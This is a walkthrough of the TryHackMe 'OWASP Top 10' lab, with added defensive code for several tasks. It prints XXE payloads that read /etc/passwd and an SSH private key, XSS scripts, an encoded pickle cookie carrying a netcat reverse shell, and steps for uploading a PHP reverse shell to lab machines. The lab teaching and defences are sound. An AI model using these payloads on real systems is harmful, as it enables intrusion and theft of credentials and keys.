In this walkthrough, we will be going through the OWASP Top 10 room from TryHackMe. This room has been designed to teach us about the OWASP Top 10 vulnerabilities and critical web security risks, and how to exploit them, in detail. So, let's get started without any delay.
Table of Contents
Task 1 – Introduction
- Broken Authentication
- Sensitive Data Exposure
- XML External Entity
- Broken Access Control
- Security Misconfiguration
- Cross-site Scripting
- Insecure Deserialization
- Components with Known Vulnerabilities
- Insufficient Logging & Monitoring
Task 2 – Accessing machines
Task 3 – [Severity 1] Injection
Question 1 – I’ve understood Injection attacks.
Task 4 – [Severity 1] OS Command Injection
Question 1 – I’ve understood command injection.
Task 5 – [Severity 1] Command Injection Practical
Question 1 – What strange text file is in the website root directory?
Question 2 – How many non-root/non-service/non-daemon users are there?
Question 3 – What user is this app running as?
Question 4 – What is the user’s shell set as?
Question 5 – What version of Ubuntu is running?
Question 6 – Print out the MOTD. What favorite beverage is shown?
Task 6 – [Severity 2] Broken Authentication
Question 1 – I’ve understood broken authentication mechanisms.
Task 7 – [Severity 2] Broken Authentication Practical
Try to register the username darren; you'll see that the user already exists. Then try to register the username " darren" (with a leading space) and you'll see that you are now logged in and can see the content that should only be visible in Darren's account, which in our case is the flag you need to retrieve.
Question 1 – What is the flag that you found in darren’s account?
Question 2 – Now try to do the same trick and see if you can login as arthur.
Question 3 – What is the flag that you found in arthur’s account?
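The " darren" trick works because the application treats " darren" and "darren" as two different accounts at registration time but as the same account afterwards. The fix is to canonicalise usernames once, in one place, and use that canonical form for both the uniqueness check and the login lookup. The following is an added example, not code from the room or its author; the in-memory `USERS` store, the `register` and `lookup` helpers and the rejection rules are assumptions chosen for illustration.

```python
import unicodedata

# Constructed in-memory user store for this example: normalised username -> record.
USERS = {"darren": {"display_name": "darren"}}


class UsernameError(ValueError):
    """Raised when a submitted username is rejected outright."""


def normalize_username(raw: str) -> str:
    """Canonicalise a username so look-alike variants map to one key.

    Steps: Unicode NFKC normalisation (folds full-width and compatibility
    characters, including the non-breaking space), strip surrounding
    whitespace, case-fold, then reject anything that still contains whitespace
    or control characters. " darren", "Darren" and "darren " all become "darren".
    """
    name = unicodedata.normalize("NFKC", raw).strip().casefold()
    if not name:
        raise UsernameError("username is empty after normalisation")
    if any(ch.isspace() or unicodedata.category(ch).startswith("C") for ch in name):
        raise UsernameError("username contains whitespace or control characters")
    return name


def register(users: dict, raw_username: str) -> bool:
    """Create the account only if its canonical form is not already taken."""
    key = normalize_username(raw_username)
    if key in users:
        return False  # the leading-space variant collides with the existing account
    users[key] = {"display_name": raw_username.strip()}
    return True


def lookup(users: dict, raw_username: str):
    """Resolve a login name with the same canonicalisation used at registration."""
    return users.get(normalize_username(raw_username))


if __name__ == "__main__":
    print(register(USERS, " darren"))   # False: same account as "darren"
    print(register(USERS, "arthur"))    # True
    print(lookup(USERS, "ARTHUR ") is USERS["arthur"])  # True
```

The important property is that `register` and `lookup` share `normalize_username`; a check applied only at login, or only at registration, recreates the mismatch the lab exploits.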
Task 8 – [Severity 3] Sensitive Data Exposure (Introduction)
Task 9 – [Severity 3] Sensitive Data Exposure (Supporting Material 1)
Question 1 – Read and understand the supporting material on SQLite Databases.
Task 10 – [Severity 3] Sensitive Data Exposure (Supporting Material 2)
Question 1 – Read the supporting material about cracking hashes.
Task 11 – [Severity 3] Sensitive Data Exposure (Challenge)
Question 1 – What is the name of the mentioned directory?
Question 2 – Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?
Question 3 – Use the supporting material to access the sensitive data. What is the password hash of the admin user?
Question 4 – What is the admin’s plaintext password?
Question 5 – Login as the admin. What is the flag?
Task 12 – [Severity 4] XML External Entity
Question 1 – Deploy the machine attached to the task.
Task 13 – [Severity 4] XML External Entity – eXtensible Markup Language
Question 1 – Full form of XML
Extensible Markup Language
Question 2 – Is it compulsory to have XML prolog in XML documents?
Question 3 – Can we validate XML documents against a schema?
Question 4 – How can we specify XML version and encoding in XML document?
Task 14 – [Severity 4] XML External Entity – DTD
Question 1 – How do you define a new ELEMENT?
Question 2 – How do you define a ROOT element?
Question 3 – How do you define a new ENTITY?
Task 15 – [Severity 4] XML External Entity – XXE Payload
Question 1 – Try the payload mentioned in description on the website.
Payload: `<?xml version="1.0"?> <!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]> <root>&read;</root>`
Task 16 – [Severity 4] XML External Entity – Exploiting
Question 1 – Try to display your own name using any payload.
Payload: `<?xml version="1.0"?><!DOCTYPE Tryhackme [<!ENTITY name "funkt10n"> ]> <userInfo> <firstName>null</firstName> <lastName>&name;</lastName> </userInfo>`
Question 2 – See if you can read the /etc/passwd
Payload: `<?xml version="1.0"?> <!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]> <root>&read;</root>`
Question 3 – What is the name of the user in /etc/passwd
Question 4 – Where is falcon’s SSH key located?
Question 5 – What are the first 18 characters for falcon’s private key
Payload: `<?xml version="1.0"?> <!DOCTYPE root [<!ENTITY read SYSTEM 'file:///home/falcon/.ssh/id_rsa'>]> <root>&read;</root>`
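Every payload in Tasks 15 and 16 needs an inline DTD to declare the entity it later references, so the simplest server-side defence is to refuse any document that carries a DOCTYPE or entity declaration before handing it to the real parser. The following is an added example of that check using only the Python standard library; it is not code from the room. The `parse_user_info` function, the `<userInfo>` handling and the constructed `BENIGN` input are assumptions; the rejected input is the /etc/passwd payload quoted above.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class XXEAttempt(ValueError):
    """Raised when a submitted document carries a DTD or entity declaration."""


def reject_dtd(xml_bytes: bytes) -> None:
    """Fail fast on any DOCTYPE or ENTITY declaration, before the real parse.

    expat calls these handlers as soon as it sees the declaration, so the
    exception fires before any entity could be referenced or resolved.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise XXEAttempt(f"DOCTYPE {name!r} is not accepted")

    def on_entity(name, is_parameter, value, base, sysid, pubid, notation):
        raise XXEAttempt(f"entity declaration {name!r} is not accepted")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(xml_bytes, True)  # raises ExpatError on malformed input


def parse_user_info(xml_bytes: bytes) -> dict:
    """Parse the <userInfo> document the lab form submits, after the DTD check."""
    reject_dtd(xml_bytes)
    root = ET.fromstring(xml_bytes)
    if root.tag != "userInfo":
        raise ValueError(f"unexpected root element {root.tag!r}")
    return {
        "firstName": root.findtext("firstName", default=""),
        "lastName": root.findtext("lastName", default=""),
    }


# Constructed inputs: a benign submission and the /etc/passwd payload from the page.
BENIGN = (b"<?xml version='1.0'?><userInfo><firstName>Ada</firstName>"
          b"<lastName>Lovelace</lastName></userInfo>")
XXE = (b"<?xml version='1.0'?><!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>"
       b"<root>&read;</root>")


def check(xml_bytes: bytes) -> str:
    """Return a one-word verdict so callers can see which path a document took."""
    try:
        parse_user_info(xml_bytes)
        return "accepted"
    except XXEAttempt:
        return "rejected"


if __name__ == "__main__":
    print(parse_user_info(BENIGN))  # {'firstName': 'Ada', 'lastName': 'Lovelace'}
    print(check(XXE))               # rejected
```

Rejecting DTDs outright is the same policy the defusedxml project applies by default; it is preferable to trying to distinguish "harmless" internal entities from SYSTEM ones, because the name-display payload in Task 16 and the file-read payload differ only in the entity body.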
Task 17 – [Severity 5] Broken Access Control
Question 1 – Read and understand how broken access control works.
Task 18 – [Severity 5] Broken Access Control (IDOR Challenge)
Question 1 – Read and understand how IDOR works.
Question 2 – Deploy the machine and go to http://10.10.106.96 – Login with the username being noot and the password test1234.
Question 3 – Look at other users notes. What is the flag?
Task 19 – [Severity 6] Security Misconfiguration
Question 1 – Deploy the VM
Question 2 – Hack into the webapp, and find the flag!
Default credentials found on: https://github.com/NinjaJc01/PensiveNotes
Task 20 – [Severity 7] Cross-site Scripting
Question 1 – Deploy the VM
Question 2 – Navigate to http://10.10.192.244/ in your browser and click on the “Reflected XSS” tab on the navbar; craft a reflected XSS payload that will cause a popup saying “Hello”.
Question 3 – On the same reflective page, craft a reflected XSS payload that will cause a popup with your machine's IP address.
Question 4 – Now navigate to http://10.10.192.244/ in your browser and click on the “Stored XSS” tab on the navbar; make an account. Then add a comment and see if you can insert some of your own HTML.
Register with a test user first and then type the following comment as payload.
- Payload: Hello Friend!
Question 4 – On the same page, make an alert popup box appear on the page with your document cookies.
Payload: `<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>`
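Both halves of Task 20 come down to two server-side controls: encode user-controlled text for the HTML context it lands in, so a stored comment cannot become markup, and mark the session cookie HttpOnly so that even a script that does run cannot read it via document.cookie. The following is an added example, not code from the room; the comment markup and the `session` cookie name are assumptions.

```python
import html
from http.cookies import SimpleCookie


def render_comment(author: str, body: str) -> str:
    """Return the comment as HTML, encoding user-controlled text for an HTML text context.

    html.escape turns < > & " ' into entities, so a stored comment such as
    <script>...</script> is displayed literally instead of being parsed as a tag.
    """
    return (f'<div class="comment"><b>{html.escape(author)}</b>: '
            f'{html.escape(body)}</div>')


def session_cookie_header(session_id: str) -> str:
    """Build a Set-Cookie header value that keeps the session id out of document.cookie.

    HttpOnly stops script from reading the cookie, Secure restricts it to HTTPS,
    and SameSite=Strict keeps it off cross-site requests.
    """
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Strict"
    cookie["session"]["path"] = "/"
    return cookie.output(header="").strip()


if __name__ == "__main__":
    # Constructed comment: the kind of input the stored-XSS tab accepts.
    print(render_comment("tester", "<script>alert(1)</script>"))
    print(session_cookie_header("c0ffee42"))
```

Escaping is context-specific: `html.escape` is right for element text and quoted attribute values, but text placed inside a `<script>` block or a URL needs that context's own encoding, which is why templating engines that auto-escape per context are preferred over hand-rolled string building.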
Task 21 – [Severity 8] Insecure Deserialization
Question 1 – Who developed the Tomcat application?
The Apache Software Foundation
Question 2 – What type of attack that crashes services can be performed with insecure deserialization?
Denial of Service
Task 22 – [Severity 8] Insecure Deserialization – Objects
Question 1 – Select the correct term of the following statement:
If a dog was sleeping, would this be:
A) A State
B) A Behaviour
Task 23 – [Severity 8] Insecure Deserialization – Deserialization
Question 1 – What is the name of the base-2 formatting that data is sent across a network as?
Task 24 – [Severity 8] Insecure Deserialization – Cookies
Question 1 – If a cookie had the path of webapp.com/login, what would the URL that the user has to visit be?
Question 2 – What is the acronym for the web technology that Secure cookies work over?
Task 25 – [Severity 8] Insecure Deserialization – Cookies Practical
Question 1 – 1st flag (cookie value)
Session ID - "gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAY2VkZDI2OTYxMTNlNDBlNGIxZTMzYjE5ODg5MmYwY2NxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg=="
Decode with: base64decode.org
Question 2 – 2nd flag (admin dashboard)
Modifying Cookie Values
Notice here that you have a cookie named “userType”. You are currently a user, as confirmed by your information on the “myprofile” page.
This application determines what you can and cannot see by your userType. What if you wanted to become an admin?
Double left-click the “Value” column of “userType” to modify the contents. Let’s change our userType to “admin” and navigate to http://10.10.13.24/admin to answer the second flag.
Go to page: http://10.10.13.24/admin
Task 26 – [Severity 8] Insecure Deserialization – Code Execution
Question 1 – flag.txt
Session ID - gASVdgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjFtybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL3NoIC1pIDI+JjEgfCBuZXRjYXQgMTAuMTguMTA3LjE2NyA0NDQ0ID4gL3RtcC9mlIWUUpQu
- Click on Feedback link and you will get a reverse shell.
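Tasks 25 and 26 show the two failure modes of a serialised session cookie: the client can edit the contents (userType becomes admin), and if the server deserialises with pickle, the client can supply an object whose reconstruction runs code. Both are closed by serialising the session as JSON and authenticating it with an HMAC, so that any edited cookie fails verification and a verified one can only ever decode to plain data. The following is an added example, not code from the room; `SECRET_KEY` is a constructed value and the cookie layout (`body.tag`) is an assumption.

```python
import base64
import hashlib
import hmac
import json

# Constructed secret for the example; a real deployment loads this from configuration.
SECRET_KEY = b"example-only-secret-rotate-me"


def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_session_cookie(data: dict, key: bytes = SECRET_KEY) -> str:
    """Serialise the session as canonical JSON and append an HMAC-SHA256 tag."""
    body = _b64e(json.dumps(data, sort_keys=True, separators=(",", ":")).encode())
    tag = _b64e(hmac.new(key, body.encode(), hashlib.sha256).digest())
    return f"{body}.{tag}"


def load_session_cookie(cookie: str, key: bytes = SECRET_KEY):
    """Return the session dict if the tag verifies, otherwise None.

    json.loads only produces dicts, lists, strings and numbers, so even a
    cookie that verifies cannot instantiate arbitrary objects the way
    pickle.loads would.
    """
    try:
        body, tag = cookie.split(".", 1)
    except ValueError:
        return None
    expected = _b64e(hmac.new(key, body.encode(), hashlib.sha256).digest())
    if not hmac.compare_digest(tag, expected):
        return None
    try:
        return json.loads(_b64d(body))
    except ValueError:  # covers bad base64 (binascii.Error) and bad JSON
        return None


def edit_body_keeping_tag(cookie: str, new_type: str) -> str:
    """Rewrite userType in the body but keep the old tag: the hand edit Task 25 describes."""
    body, tag = cookie.split(".", 1)
    data = json.loads(_b64d(body))
    data["userType"] = new_type
    new_body = _b64e(json.dumps(data, sort_keys=True, separators=(",", ":")).encode())
    return f"{new_body}.{tag}"


if __name__ == "__main__":
    cookie = make_session_cookie({"sessionId": "c0ffee", "userType": "user"})
    print(load_session_cookie(cookie))                        # the original dict
    print(load_session_cookie(edit_body_keeping_tag(cookie, "admin")))  # None
```

Authorisation decisions should still be made against server-side state keyed by `sessionId`; the signed cookie only guarantees the client did not alter what the server issued, it does not make `userType` a safe place to store privilege if the key ever leaks.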
Task 27 – [Severity 9] Components With Known Vulnerabilities – Intro
Question 1 – Read above.
Task 28 – [Severity 9] Components With Known Vulnerabilities – Exploit
Question 1 – Read the above!
Task 29 – [Severity 9] Components With Known Vulnerabilities – Lab
Question 1 – How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)
- We have an application named CSE Bookstore. In the bottom right corner there is an admin login marked 2017, which hints at how old the software running the portal is.
- Search Google for an exploit related to CSE Bookstore 2017.
- Download the exploit.
- Fire the exploit with `python3 47887.py http://10.10.162.73/`
Another method for exploiting
- Go to admin login page
- Try default credentials: admin:admin
- You will be logged into the admin panel
- Click on Edit
- Click on Browse and upload a reverse PHP shell to the server.
- Click Confirm
- Get the reverse PHP shell here: https://github.com/pentestmonkey/php-reverse-shell and change the IP inside it to your TryHackMe VPN IP.
- Now setup a netcat listener on the specified port.
- We have uploaded the reverse shell to the directory where the product images are stored. Right-click on any product image and open it in a new tab; you will get the following path:
- Now trigger the reverse shell by visiting the following path – http://10.10.162.73/bootstrap/img/rev.php. You should get a connection back.
- We have successfully pwned the system once more.
Task 30 – [Severity 10] Insufficient Logging and Monitoring
Question 1 – What IP address is the attacker using?
Question 2 – What kind of attack is being carried out?
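Task 30 asks you to read a login log by eye and pick out the attacker's IP and the attack type. The same judgement can be automated: group failed logins by source address, count them inside a sliding time window, and flag any address that crosses a threshold, reporting which usernames it tried. The following is an added example, not code from the room or its lab. The log format and the log lines are constructed for the example (RFC 5737 documentation addresses), not the lab's own log, and the threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in a made-up "<timestamp> <status> <source-ip> user=<name>" format.
LOG_LINES = """\
2024-05-01T10:00:01 200 198.51.100.7 user=alice
2024-05-01T10:02:13 401 203.0.113.5 user=admin
2024-05-01T10:02:14 401 203.0.113.5 user=administrator
2024-05-01T10:02:15 401 203.0.113.5 user=root
2024-05-01T10:02:16 401 203.0.113.5 user=guest
2024-05-01T10:02:17 401 203.0.113.5 user=info
2024-05-01T10:05:40 401 198.51.100.7 user=alice
2024-05-01T10:05:52 200 198.51.100.7 user=alice
this line is malformed and must be skipped
"""

LINE_RE = re.compile(r"^(\S+) (\d{3}) (\S+) user=(\S+)$")


def parse_line(line: str):
    """Return a dict for a well-formed line, or None so callers can skip noise."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, status, ip, user = m.groups()
    return {"ts": datetime.fromisoformat(ts), "status": int(status), "ip": ip, "user": user}


def detect_brute_force(lines, threshold: int = 5, window: timedelta = timedelta(minutes=5)) -> dict:
    """Flag source IPs with at least `threshold` failed logins inside any `window`.

    For each IP the densest window is found with two pointers over the sorted
    failure timestamps; the report lists the distinct usernames tried, which
    distinguishes one account being hammered from many accounts being sprayed.
    """
    failures = defaultdict(list)  # ip -> [(timestamp, username), ...]
    for line in lines:
        event = parse_line(line)
        if event and event["status"] == 401:
            failures[event["ip"]].append((event["ts"], event["user"]))

    findings = {}
    for ip, events in failures.items():
        events.sort()
        best_start, best_end, start = 0, 0, 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start > best_end - best_start:
                best_start, best_end = start, end
        count = best_end - best_start + 1
        if count >= threshold:
            users = sorted({user for _, user in events[best_start:best_end + 1]})
            findings[ip] = {
                "failures": count,
                "users": users,
                "pattern": "many accounts" if len(users) > 1 else "single account",
            }
    return findings


if __name__ == "__main__":
    for ip, info in detect_brute_force(LOG_LINES.splitlines()).items():
        print(f"{ip}: {info['failures']} failures, {info['pattern']}, tried {info['users']}")
```

Alice's single 401 followed by a 200 is the normal "typo then success" pattern and stays below the threshold; the other address fails five times in four seconds against five different accounts, which is exactly what the lab expects you to spot by reading the log.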
Task 31 – What Next?
So that was "OWASP Top 10" for you. In this room, we have covered the OWASP Top 10 web application vulnerabilities and their exploitation. We covered vulnerabilities like Injection, which includes SQLi and more. Then we took a dive into Broken Authentication. Moving on, we learned about XSS, XXE, IDOR, Insecure Deserialization, Insufficient Logging, Components with Known Vulnerabilities and much more. This room was certainly very lengthy, but it covers everything in great detail regarding the OWASP Top 10 risks and vulnerabilities. On that note, I will take your leave and will meet you in the next one. Till then, "Keep Hacking".